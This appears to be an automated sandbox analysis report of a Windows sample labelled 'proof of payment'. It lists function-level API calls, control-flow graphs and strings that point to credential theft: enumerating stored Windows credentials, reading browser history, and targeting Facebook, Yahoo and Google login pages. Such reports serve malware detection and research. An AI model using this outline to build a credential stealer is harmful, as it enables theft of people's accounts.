                                      • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                      • String ID:
                                      • API String ID: 3715365532-3916222277
                                      • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                      • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                      • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                      • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 577 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 580 413f00-413f11 Process32NextW 577->580 581 413da5-413ded OpenProcess 580->581 582 413f17-413f24 CloseHandle 580->582 583 413eb0-413eb5 581->583 584 413df3-413e26 memset call 413f27 581->584 583->580 585 413eb7-413ebd 583->585 592 413e79-413e9d call 413959 call 413ca4 584->592 593 413e28-413e35 584->593 587 413ec8-413eda call 4099f4 585->587 588 413ebf-413ec6 ??3@YAXPAX@Z 585->588 590 413edb-413ee2 587->590 588->590 598 413ee4 590->598 599 413ee7-413efe 590->599 604 413ea2-413eae CloseHandle 592->604 596 413e61-413e68 593->596 597 413e37-413e44 GetModuleHandleW 593->597 596->592 600 413e6a-413e76 596->600 597->596 602 413e46-413e5c GetProcAddress 597->602 598->599 599->580 600->592 602->596 604->583
                                      APIs
                                        • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                      • memset.MSVCRT ref: 00413D7F
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                      • memset.MSVCRT ref: 00413E07
                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                      • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                      • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                      • String ID: QueryFullProcessImageNameW$kernel32.dll
                                      • API String ID: 912665193-1740548384
                                      • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                      • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                      • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                      • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                        • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                        • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                        • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                        • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                        • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                      • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                      • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                      • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                        • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                      • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                      • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                      • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                      • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                      • CloseHandle.KERNEL32(?), ref: 0040E148
                                      • CloseHandle.KERNEL32(?), ref: 0040E14D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                      • String ID: bhv
                                      • API String ID: 327780389-2689659898
                                      • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                      • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                      • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                      • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 633 413f4f-413f52 634 413fa5 633->634 635 413f54-413f5a call 40a804 633->635 637 413f5f-413fa4 GetProcAddress * 5 635->637 637->634
                                      APIs
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                      • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                      • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                      • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                      • API String ID: 2941347001-70141382
                                      • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                      • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                      • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                      • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 638 4466f4-44670e call 446904 GetModuleHandleA 641 446710-44671b 638->641 642 44672f-446732 638->642 641->642 643 44671d-446726 641->643 644 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 642->644 646 446747-44674b 643->646 647 446728-44672d 643->647 652 4467ac-4467b7 __setusermatherr 644->652 653 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 644->653 646->642 648 44674d-44674f 646->648 647->642 650 446734-44673b 647->650 651 446755-446758 648->651 650->642 654 44673d-446745 650->654 651->644 652->653 657 446810-446819 653->657 658 44681e-446825 653->658 654->651 659 4468d8-4468dd call 44693d 657->659 660 446827-446832 658->660 661 44686c-446870 658->661 664 446834-446838 660->664 665 44683a-44683e 660->665 662 446845-44684b 661->662 663 446872-446877 661->663 667 446853-446864 GetStartupInfoW 662->667 668 44684d-446851 662->668 663->661 664->660 664->665 665->662 669 446840-446842 665->669 671 446866-44686a 667->671 672 446879-44687b 667->672 668->667 668->669 669->662 673 44687c-446894 GetModuleHandleA call 41276d 671->673 672->673 676 446896-446897 exit 673->676 677 44689d-4468d6 _cexit 673->677 676->677 677->659
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                      • String ID:
                                      • API String ID: 2827331108-0
                                      • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                      • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                      • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                      • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • memset.MSVCRT ref: 0040C298
                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                      • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                      • wcschr.MSVCRT ref: 0040C324
                                      • wcschr.MSVCRT ref: 0040C344
                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                      • GetLastError.KERNEL32 ref: 0040C373
                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                      • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                      • String ID: visited:
                                      • API String ID: 1157525455-1702587658
                                      • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                      • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                      • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                      • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 704 40e175-40e1a1 call 40695d call 406b90 709 40e1a7-40e1e5 memset 704->709 710 40e299-40e2a8 call 4069a3 704->710 712 40e1e8-40e1fa call 406e8f 709->712 716 40e270-40e27d call 406b53 712->716 717 40e1fc-40e219 call 40dd50 * 2 712->717 716->712 722 40e283-40e286 716->722 717->716 728 40e21b-40e21d 717->728 725 40e291-40e294 call 40aa04 722->725 726 40e288-40e290 ??3@YAXPAX@Z 722->726 725->710 726->725 728->716 729 40e21f-40e235 call 40742e 728->729 729->716 732 40e237-40e242 call 40aae3 729->732 732->716 735 40e244-40e26b _snwprintf call 40a8d0 732->735 735->716
                                      APIs
                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                      • memset.MSVCRT ref: 0040E1BD
                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                        • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                        • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                      • _snwprintf.MSVCRT ref: 0040E257
                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                      • String ID: $ContainerId$Container_%I64d$Containers$Name
                                      • API String ID: 3883404497-2982631422
                                      • Opcode ID: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
                                      • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                      • Opcode Fuzzy Hash: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
                                      • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                        • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                      • memset.MSVCRT ref: 0040BC75
                                      • memset.MSVCRT ref: 0040BC8C
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                      • memcmp.MSVCRT ref: 0040BCD6
                                      • memcpy.MSVCRT ref: 0040BD2B
                                      • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                      • String ID:
                                      • API String ID: 509814883-3916222277
                                      • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                      • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                      • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                      • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 789 41837f-4183bf 790 4183c1-4183cc call 418197 789->790 791 4183dc-4183ec call 418160 789->791 796 4183d2-4183d8 790->796 797 418517-41851d 790->797 798 4183f6-41840b 791->798 799 4183ee-4183f1 791->799 796->791 800 418417-418423 798->800 801 41840d-418415 798->801 799->797 802 418427-418442 call 41739b 800->802 801->802 805 418444-41845d CreateFileW 802->805 806 41845f-418475 CreateFileA 802->806 807 418477-41847c 805->807 806->807 808 4184c2-4184c7 807->808 809 41847e-418495 GetLastError ??3@YAXPAX@Z 807->809 812 4184d5-418501 memset call 418758 808->812 813 4184c9-4184d3 808->813 810 4184b5-4184c0 call 444706 809->810 811 418497-4184b3 call 41837f 809->811 810->797 811->797 819 418506-418515 ??3@YAXPAX@Z 812->819 813->812 819->797
                                      APIs
                                      • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                      • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                      • GetLastError.KERNEL32 ref: 0041847E
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: CreateFile$??3@ErrorLast
                                      • String ID: |A
                                      • API String ID: 1407640353-1717621600
                                      • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                      • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                      • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                      • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                      • String ID: r!A
                                      • API String ID: 2791114272-628097481
                                      • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                      • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                      • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                      • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                        • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                        • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                        • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                        • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                        • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                        • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                        • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                      • _wcslwr.MSVCRT ref: 0040C817
                                        • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                        • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                      • wcslen.MSVCRT ref: 0040C82C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                      • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                      • API String ID: 62308376-4196376884
                                      • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                      • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                      • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                      • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                      • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                      • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                      • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                      • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                      • memcpy.MSVCRT ref: 0040B60D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                      • String ID: BIN
                                      • API String ID: 1668488027-1015027815
                                      • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                      • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                      • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                      • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                      • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                      • wcslen.MSVCRT ref: 0040BE06
                                      • _wcsncoll.MSVCRT ref: 0040BE38
                                      • memset.MSVCRT ref: 0040BE91
                                      • memcpy.MSVCRT ref: 0040BEB2
                                      • _wcsnicmp.MSVCRT ref: 0040BEFC
                                      • wcschr.MSVCRT ref: 0040BF24
                                      • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                      • String ID:
                                      • API String ID: 3191383707-0
                                      • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                      • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                      • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                      • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00403CBF
                                      • memset.MSVCRT ref: 00403CD4
                                      • memset.MSVCRT ref: 00403CE9
                                      • memset.MSVCRT ref: 00403CFE
                                      • memset.MSVCRT ref: 00403D13
                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
